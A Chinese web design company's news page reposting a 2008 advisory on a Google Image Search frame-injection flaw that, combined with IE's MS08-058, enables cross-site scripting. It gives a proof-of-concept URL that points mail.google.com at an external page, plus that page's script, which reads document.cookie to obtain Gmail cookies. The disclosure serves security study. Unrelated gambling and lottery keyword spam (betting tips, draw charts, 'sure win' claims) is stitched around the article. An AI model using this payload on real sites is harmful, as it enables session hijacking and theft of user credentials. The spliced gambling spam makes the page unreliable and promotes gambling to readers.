网球冠军数排名
深一集團40%的客戶來自外地,80%的業務來自搜索引擎和良好口碑!
微信 微信人工客服  |
微信人工客服
QQ在線溝通

新聞中心

全國業務咨詢請致電

400-666-2014

為您打響品牌第一炮
  • 在線QQ
  • 在線客服
  • 在線留言
跨站腳本漏洞,利用MS08-058攻擊Google
發布日期:2008-10-22   關鍵詞:觀蘭網站建設★觀蘭網頁設計◆觀瀾網站制作   已有 5504 人瀏覽
國內安全組織80sec近日發現,Google提供的圖片搜索服務存在安全問題,結合IE瀏覽器的MS08-058漏洞可以造成整站的跨站腳本漏洞,幾乎可以控制所有的Google服務和獲得目標用戶的認證信息。

漏洞說明:Google是全球最大的搜索引擎。同時Google擁有其他龐大的WEB應用程序產品線,涉及EMAIL、BLOG、在線文檔、個人主頁、電子地圖、論壇、RSS等互聯網幾乎所有的應用業務。80sec發現Google提供的圖片搜索服務存在安全問題,結合IE瀏覽器的MS08-058漏洞可以造成整站的跨站腳本漏洞,幾乎可以控制所有的Google服務和獲得目標用戶的認證信息。

漏洞站點:http://www.google.com

漏洞解析:Google提供的圖片搜索服務存在網頁框架安全問題,惡意攻擊者可以指定網頁的內嵌框架頁指向任意網頁。該服務提供的URL地址主域名可以更改成Google的其他業務的子域名,從而造成嚴重的釣魚網頁攻擊隱患。如下:黑客指定imgrefurl參數就可能構造GMAIL相關服務的釣魚網頁。

http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com&hl=com

該漏洞結合由80SEC團隊成員發現的IE瀏覽器的MS08-058部分漏洞可以造成GOOGLE整站的跨站腳本XSS漏洞,linx在《利用IE 框架跨域》文檔分析了MS08-058涉及網頁框架安全問題,子框架網頁可以操作主框架的窗口句柄。這種類型的漏洞主要危害是不受IE瀏覽器同源策略的限制,可以跨域控制其他域的網頁,影響所有的WEB應用。微軟已經在08年10月提供了MS08-058補丁修復了該漏洞。

測試代碼:

將Google的漏洞頁指向MS08-058漏洞攻擊頁

http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com/MS08-058.htm&hl=com

MS08-058.htm內容


<script>
setTimeout (
function(){
parent.location.href = new String("javascript:alert(document.cookie)");
}
,1500);
</script>

即可獲得GAMIL的Cookie信息

危害提醒:

黑客利用瀏覽器漏洞可以使這種類型的低風險Web安全漏洞擴大成影響所有Web應用的高風險安全問題,請各大網站及安全管理人員仔細分析評估MS08-058類型的Web安全問題。

注:本文來自深一集團原創或轉截 http://www.axeux.com/newslist_462_2.html 如需轉載,請注明出處!
深一網絡公司專注設計13年
全國網站建設
深一云服務器深一云服務器
高性能,高安全
網絡公司拒絕不當利
崇尚野蠻生長
500強企業網500強企業網
站建設供應商
10000家客戶案例10000家客戶案
實力說服力
83位技術團隊83位技術團隊
服務高保障
深一只做有排名網站只做有排名
有價值的網站
200人服務團隊200人服務團隊
追求客戶滿意
网球冠军数排名 天津时时开奖结果表 重庆时时彩到底有多假 什么计划软件最准 二八杠棋牌下载安装 扑克21点要牌技巧 2019时时彩20分钟开奖 重庆时时彩走势图 pk10直播开奖赛车链接 重庆时时五星彩走势图 腾讯分分彩几组六技巧 赌龙虎要怎样才稳赢 汇彩网app